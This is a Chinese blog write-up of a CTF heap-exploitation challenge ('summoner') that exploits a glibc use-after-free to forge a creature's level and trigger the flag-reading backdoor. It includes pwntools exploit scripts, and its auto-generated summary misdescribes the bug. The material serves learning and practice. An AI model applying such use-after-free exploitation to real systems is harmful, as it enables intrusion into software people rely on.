Pwn-Glibc堆利用-FirstFit&UAF浅析

最新推荐文章于 2024-05-03 16:44:55 发布
最新推荐文章于 2024-05-03 16:44:55 发布
阅读量251 收藏
点赞数
分类专栏: pwn chunk 文章标签: c++ python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pointerr/article/details/120771676
版权
本文详细解析了一个利用未初始化的自由块(Use-After-Free, UAF)漏洞进行堆溢出,修改堆中等级变量,最终达到执行系统命令获取Shell的过程。通过分析程序结构和堆内存管理,构造特定输入以篡改数据,展示了安全编程中的常见风险及其利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x1

最近忙于堆的学习,在师傅们的指导下,对堆有了一知半解,找了一个网上的UAF题目来练手。
题目链接:https://www.bilibili.com/video/BV1iE411H7cZ
(再次感谢大佬发布的教学视频)
先检查一下程序:
在这里插入图片描述
发现保护全开。64位,反编译之后发现:
在这里插入图片描述
在main函数中看到后门函数cat flag,但是条件是变量值为5。
运行一下:
在这里插入图片描述
大概意思是程序可以生成一个creature【堆】,里面包含姓名和等级两个参数数据,并且可以通过输入命令来改变这些变量:

After you climb over the snow mountain, you encounter an evil summoner!

He summoned "The Dark Lord" Level 5! You have to get over his dead body to fight the Demon Dragon, but you can only summon Level 4 creatures!

What's your plan for now???

Available plans:
	show - show your creature and its level
	summon [name] - summon a creature called [name]
	level-up [level] - level up your creature (below Level 5)
	strike - STRIKE the evil summoner's creature!!!
	release - release your creature
	quit - give up and die

然后只要达到level5,就能cat flag。
但是程序本身不允许level-up 5指令生效。
**

0x2

漏洞原因:在release指令中,如果释放掉一个仅仅释放堆中的内容,而不是释放堆指针,则会造成只释放了堆数据,我们还可以通过堆溢出复写该指针指向的数据,从而覆盖恶意代码,达到getshell。
在这里插入图片描述

free之后,只把原来的内容置null,没有将原指针置null!
free执行之后,数据还位于原来的地方,没有改变

(UAF不区分bins,不管在fastbin还是unsortedbin,都会产生use after free现象)
思路:
1.将堆中level等级变量置为5
2.将原来的结构体指针申请回来
首先,申请一个堆块,name为aaaa:

from pwn import *

p=process('./summoner')
def dbg():
    gdb.attach(p)
    pause()

sla=lambda x,y:p.sendlineafter(x,y)

sla('> ','summon aaaa')
dbg()

观察堆空间变化:
在这里插入图片描述
在这里插入图片描述
可以发现:在0x5624b5d81040处出现注入的0x61616161,即该位置存放name值。
再次编写脚本,发送level等级的创建:

from pwn import *

p=process('./summoner')
def dbg():
    gdb.attach(p)
    pause()

sla=lambda x,y:p.sendlineafter(x,y)
sla('> ','summon aaaa')
sla('> ','level-up 4')
#
dbg()

发现在top_chunk中存放着name的地址以及等级的内容,我们可以推断该程序结构体构成:

struct{
	char *name;
	int level;
}

在这里插入图片描述
从而,我们可以通过堆溢出,修改等级,修改level等级,从而实现getshell。

具体实现:

from pwn import *

p=process('./summoner')
def dbg():
    gdb.attach(p)
    pause()

sla=lambda x,y:p.sendlineafter(x,y)
sla('> ','summon aaaaaaaa'+'\x05')
sla('> ','release')
#
dbg()

在这里插入图片描述
从而,也能看出:即使free掉了*ptr,但是只free了name值,level等级依然存在于堆中。
我们再次申请一个堆块,可以发现,由于UAF机制,释放掉的堆会直接被再次当作一个新堆块被申请,实现如下payload:

from pwn import *

p=process('./summoner')
def dbg():
    gdb.attach(p)
    pause()

sla=lambda x,y:p.sendlineafter(x,y)
sla('> ','summon aaaaaaaa'+'\x05')
sla('> ','release')
sla('> ','summon bb')
#sla('> ','strike')

dbg()

在这里插入图片描述
这里我们可以发现:等级被覆盖成了level-5.
输入strike指令,即可满足题目*(ptr+2)>=5,实现getshell:

from pwn import *

p=process('./summoner')
def dbg():
    gdb.attach(p)
    pause()

sla=lambda x,y:p.sendlineafter(x,y)
sla('> ','summon aaaaaaaa'+'\x05')
sla('> ','release')
sla('> ','summon bb')
sla('> ','strike')

dbg()

运行结果:
这里我本地没有建这个flag文件,师傅们将就看,,但是确实执行了system("/bin/cat /pwn/flag")。
在这里插入图片描述

pwn入门08---利用之uaf
weixin_45943522的博客
02-21 1592
use_after_free 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使
pwn学习】溢出(二)- First Fit
Morphy_Amo的博客
01-09 1106
glibc管理中的First Fit机制
first_fit&UAF(heap)
个人笔记
06-21 289
first_fit&UAFfirst_fit原理实例分析原理UAF实例 first_fit原理 管理器对free的chunk未完全回收,当再次调用malloc时,会分配先前已经有内容的chunk。 大致流程如下图,但需要避免一些对管理器的检测机制(在一定限制条件下) 实例分析原理 下面看个demo调试,验证上面情况。 #include<stdio.h> #include<stdlib.h> #include<string.h> int main() {
pwn with glibc heap(利用手册)
weixin_30542079的博客
08-03 767
前言 ​ 对一些有趣的相关的漏洞的利用做一个记录,如有差错,请见谅。 ​ 文中未做说明 均是指 glibc 2.23 ​ 相关引用已在文中进行了标注,如有遗漏,请提醒。 简单源码分析 ​ 本节只是简单跟读了一下 malloc 和 free 的源码, 说的比较简单,很多细节还是要自己拿一份源代码来读。 中的一些数据结构 管理结构 struct malloc_state { mutex_t m...
PWN_glibc管理机制及内存结构(入门篇)
weixin_57140753的博客
12-25 474
CTF利用基础
linux_pwn(1)--uaf
azraelxuemo的博客
03-04 1240
文章目录What is uafpwn题例题add函数show函数delete函数开始做题准备框架调试attackexp总结 What is uaf use after free 一般可能会有以下的场景 ptr=malloc(0x10) free(ptr) ptr-> 可能写代码不会出现这样的明显错误,但如果多文件呢?可能你这个地方释放了,其他地方还存在引用 所以项目中记住,free之后立刻ptr=NULL pwn题 在ctf里面,一般uaf出题模式就是 在bss开辟了区域,保存了每个heap的地址,
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.youkuaiyun.com/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
pwn -- glibc-2.29漏洞利用学习
lifanxin的博客
04-30 705
glibc-2.29概述Tcache Stashing Unlink Attack任意位置写入较大值总结 概述   这里记录下版本为libc-2.29.so的漏洞利用方式,一是防止遗忘,二是供大家学习。 Tcache Stashing Unlink Attack   攻击原理和细节代码我就不分析了,着重记录下攻击方式和效果,这里利用tcache stashing unlink attack可以实现两种攻击效果:   1、任意位置写入较大值   2、任意地址chunk分配 任意位置写入较大值   该漏洞发生在
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
glibc 2.31 pwn——house of pig原题分析与示例程序
CoLin的pwn小屋
01-09 1454
house of pig题目解析及演示程序
PWN知识点整理(2)UAF
qq_52469954的博客
10-28 420
UAF全称use after,其内容如名称,在free后再进行利用,UAF是结构漏洞的重要利用方式。
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 403
这道题可以用来当做的入门题来做 开了NX 这是的菜单;
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1760
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
[蓝桥杯2024]-PWN:ezheap解析(glibc2.31,glibc2.31下的double free)
最新发布
2301_79326813的博客
05-03 1087
查看保护查看ida大致就是只能创建0x60大小的块,并且uaf只能利用一次。
什么是glibc
stepup
04-01 1103
参考:http://www.win.tue.nl/~aeb/linux/lk/lk-3.html glibc是gnu发布的libc库,也即c运行库。glibc是linux系统中最底层的api(应用程序开发接口),几乎其它任何的运行 库都会倚赖于glibcglibc除了封装linux操作系统所提供的系统服务外,它本身也提供了许多其它一些必要功能服务的实现,主要的如下: (1)strin
pwn题切换不同glibc版本实测
csdn546229768的博客
01-28 4119
pwn题目到了题目就是和glibc打交道,所以系统默认的一个libc肯定是满足不了各种题目类型的需求的,刚开始学习pwn时就看别人文章说最好一起下载ubuntu16\ubuntu18没想明白是为什么,直到接触了题,哦~原来如此,不过因为我是将ubuntu20安装在了物理机上,所以就想办法给整合在一起了 看了网上大佬们的一些玩法,大概流程就是自己下载libc源码进行编译然后修改程序so文件路径,听起来简单,琢磨了一晚上终究还是没有编译出来,后来还是用下载源码+通过patchelf进行替换,试了下好像确实
glibc-2.29学习(上)
weixin_44145820的博客
05-28 1301
利用在CTF的PWN题目中一直占比较大,而最近的比赛的平台也逐渐从Ubuntu16,Ubuntu18向Ubuntu19甚至更高版本转移,为此学习一下libc-2.29中新的特性对做题还是很有帮助的 libc-2.29新变化 libc-2.29中修改了对tcache_entry的定义,通过注释我们也能看出新增加的key是为了检测double free的,如下 /* We overlay this structure on the user-data portion of a chunk when t
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值